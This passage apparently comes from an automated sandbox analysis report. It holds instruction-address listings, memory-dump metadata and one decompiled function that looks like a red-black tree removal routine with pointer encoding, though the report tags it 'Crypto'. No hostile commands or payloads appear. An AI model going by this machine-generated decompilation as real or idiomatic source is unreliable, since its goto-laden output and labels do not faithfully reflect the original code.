                                  0x1e3d268a
                                  0x1e3d268b
                                  0x1e3d268e
                                  0x1e3d268f
                                  0x1e3d2691
                                  0x1e3d2696
                                  0x1e3d2698
                                  0x1e3d269d
                                  0x1e3d269f
                                  0x00000000
                                  0x1e3d269f
                                  0x1e3d2681
                                  0x00000000
                                  0x00000000
                                  0x1e3d2846
                                  0x00000000
                                  0x00000000
                                  0x1e3d2605
                                  0x1e3d260a
                                  0x1e3d260c
                                  0x1e3d2611
                                  0x1e3d2616
                                  0x1e3d2619
                                  0x1e3d2619
                                  0x1e3d261e
                                  0x00000000
                                  0x1e3d2624
                                  0x1e3d2627
                                  0x1e3d2627
                                  0x00000000
                                  0x00000000
                                  0x1e415b1f
                                  0x00000000
                                  0x00000000
                                  0x1e3d2894
                                  0x1e3d289b
                                  0x1e3d289d
                                  0x1e3d28a1
                                  0x1e415b2b
                                  0x1e415b2e
                                  0x1e415b2e
                                  0x1e3d28a7
                                  0x1e3d28a9
                                  0x1e415b04
                                  0x1e415b09
                                  0x1e415b09
                                  0x1e415b09
                                  0x00000000
                                  0x00000000
                                  0x1e415b35
                                  0x1e415b3c
                                  0x1e3d28fb
                                  0x1e3d28fb
                                  0x1e3d26cc
                                  0x1e3d26cc
                                  0x1e3d26d0
                                  0x00000000
                                  0x1e3d26d2
                                  0x1e3d26d2
                                  0x00000000
                                  0x1e3d26d2
                                  0x00000000
                                  0x00000000
                                  0x1e3d25fe
                                  0x1e3d292d
                                  0x1e3d292d
                                  0x1e3d2930
                                  0x1e3d2935
                                  0x1e3d2937
                                  0x1e3d293c
                                  0x1e3d293d
                                  0x1e3d293f
                                  0x1e3d2946
                                  0x1e3d294d
                                  0x1e3d294e
                                  0x1e3d2950
                                  0x1e3d2951
                                  0x1e3d2951
                                  0x1e3d2952
                                  0x1e3d2958
                                  0x1e3d295b
                                  0x1e3d2960
                                  0x1e3d2963
                                  0x1e3d2968
                                  0x1e3d2969
                                  0x1e3d296a
                                  0x1e3d2970
                                  0x1e3d2971
                                  0x1e3d2974
                                  0x1e3d2977
                                  0x1e3d297c
                                  0x1e3d297d
                                  0x1e3d297e
                                  0x1e3d297f
                                  0x1e3d2980
                                  0x1e3d2981
                                  0x1e3d2982
                                  0x1e3d2983
                                  0x1e3d2984
                                  0x1e3d2985
                                  0x1e3d2986
                                  0x1e3d2987
                                  0x1e3d2988
                                  0x1e3d2989
                                  0x1e3d298a
                                  0x1e3d298b
                                  0x1e3d298c
                                  0x1e3d298d
                                  0x1e3d298e
                                  0x1e3d298f
                                  0x1e3d2990
                                  0x1e3d2992
                                  0x1e3d2997
                                  0x1e3d29a3
                                  0x1e3d29a6
                                  0x1e3d29ab
                                  0x1e3d29ad
                                  0x1e3d29b0
                                  0x1e3d29b2
                                  0x1e415c80
                                  0x1e3d29b8
                                  0x1e3d29b8
                                  0x1e3d29bb
                                  0x1e3d29c0
                                  0x1e3d29c5
                                  0x1e3d29c6
                                  0x1e3d29c6
                                  0x1e3d29c9
                                  0x1e3d29cb
                                  0x00000000
                                  0x00000000
                                  0x1e3d29cd
                                  0x1e3d29d0
                                  0x1e3d29d9
                                  0x1e3d29db
                                  0x1e3d29dd
                                  0x1e3d2a7f
                                  0x1e3d2a84
                                  0x1e3d2a87
                                  0x1e3d2a89
                                  0x1e415ca1
                                  0x1e415ca3
                                  0x00000000
                                  0x1e3d2a8f
                                  0x1e3d2a8f
                                  0x00000000
                                  0x1e3d2a8f
                                  0x00000000
                                  0x1e3d29e3
                                  0x1e3d29e3
                                  0x1e3d29e3
                                  0x00000000
                                  0x1e3d29e3
                                  0x1e3d29dd
                                  0x00000000
                                  0x1e3d29db
                                  0x1e3d29e6
                                  0x1e3d29e9
                                  0x1e3d29eb
                                  0x1e3d29ed
                                  0x1e3d29f3
                                  0x1e3d29f5
                                  0x1e3d29f8
                                  0x1e3d29fa
                                  0x1e3d2a97
                                  0x1e3d2a9a
                                  0x1e3d2a9d
                                  0x1e3d2add
                                  0x00000000
                                  0x1e3d2a9f
                                  0x1e3d2aa2
                                  0x1e3d2aa5
                                  0x1e3d2aa8
                                  0x1e3d2aab
                                  0x1e415cab
                                  0x1e415caf
                                  0x1e415cc5
                                  0x1e415cda
                                  0x1e415cdc
                                  0x1e415cdf
                                  0x1e415ce5
                                  0x00000000
                                  0x1e415ceb
                                  0x1e415ced
                                  0x1e415cee
                                  0x00000000
                                  0x1e415cee
                                  0x1e415cb1
                                  0x1e415cb4
                                  0x1e415cb9
                                  0x1e415cbb
                                  0x00000000
                                  0x1e415cbd
                                  0x1e415cbd
                                  0x00000000
                                  0x1e415cbd
                                  0x1e415cbb
                                  0x1e3d2ab1
                                  0x1e3d2ab1
                                  0x1e3d2ac4
                                  0x1e3d2ac6
                                  0x1e3d2ac6
                                  0x00000000
                                  0x1e3d2ac6
                                  0x1e3d2aab
                                  0x00000000
                                  0x1e3d2a00
                                  0x1e3d2a09
                                  0x1e3d2a0e
                                  0x1e3d2a21
                                  0x1e3d2a24
                                  0x1e3d2a35
                                  0x1e3d2a3a
                                  0x1e3d2a3d
                                  0x1e3d2a42
                                  0x1e3d2a59
                                  0x1e3d2a59
                                  0x1e3d2a5c
                                  0x1e3d2a5f
                                  0x1e3d2a5f
                                  0x1e3d29fa
                                  0x1e3d29f3
                                  0x1e3d2a64
                                  0x1e3d2a64
                                  0x1e3d2a6b
                                  0x1e3d2a6b
                                  0x1e3d2a6d
                                  0x1e3d2a72
                                  0x1e3d2a72
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID: PATH
                                  • API String ID: 0-1036084923
                                  • Opcode ID: 1bdcb8070d9471ccf7fbae13a7332380e65c8477ac2325fc0249dfabc85de32d
                                  • Instruction ID: ca3ba7ddd2bbc8decde1601b7282267ecc70d950a386f2030515d9f234ffeaec
                                  • Opcode Fuzzy Hash: 1bdcb8070d9471ccf7fbae13a7332380e65c8477ac2325fc0249dfabc85de32d
                                  • Instruction Fuzzy Hash: 87C1A0B6D00319DBDB14CF99D880AADB7B5FF48B20F85461AE801BB250E775A945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3AF900, Relevance: .9, Instructions: 863COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 99%
                                  			E1E3AF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}








































































































                                  0x1e3af90b
                                  0x1e3af911
                                  0x1e3af917
                                  0x1e3af919
                                  0x1e3af91c
                                  0x1e405d63
                                  0x1e405d69
                                  0x1e405d69
                                  0x1e405d63
                                  0x1e3af922
                                  0x1e3af927
                                  0x1e405d72
                                  0x1e405d78
                                  0x1e405d78
                                  0x1e405d72
                                  0x1e3af92d
                                  0x1e3af931
                                  0x1e3afa2d
                                  0x1e3afa2d
                                  0x1e3af939
                                  0x1e3af940
                                  0x1e3af944
                                  0x1e3afa37
                                  0x1e3afa39
                                  0x1e3afa3c
                                  0x1e3afa3e
                                  0x1e3afa41
                                  0x1e3afa48
                                  0x1e3afe68
                                  0x1e3afe6c
                                  0x1e3afe6c
                                  0x1e3afe78
                                  0x1e3afe78
                                  0x1e3afe7a
                                  0x1e3afe7a
                                  0x1e3afe7e
                                  0x1e3afe6e
                                  0x1e3afe6e
                                  0x1e3afe72
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3afe80
                                  0x1e3afe80
                                  0x1e3afe83
                                  0x00000000
                                  0x1e3afe83
                                  0x1e405d7f
                                  0x1e405d81
                                  0x00000000
                                  0x00000000
                                  0x1e405d87
                                  0x00000000
                                  0x1e405d87
                                  0x1e3afa4e
                                  0x1e3afa50
                                  0x1e405d90
                                  0x00000000
                                  0x00000000
                                  0x1e405d98
                                  0x1e3afa58
                                  0x1e3afa58
                                  0x1e3afa5d
                                  0x1e3afa60
                                  0x1e3afa63
                                  0x1e3afa69
                                  0x1e3afa6b
                                  0x1e3afa6e
                                  0x1e3afa71
                                  0x1e405da1
                                  0x1e405da7
                                  0x1e405da7
                                  0x1e405da1
                                  0x1e3afa79
                                  0x1e3b0071
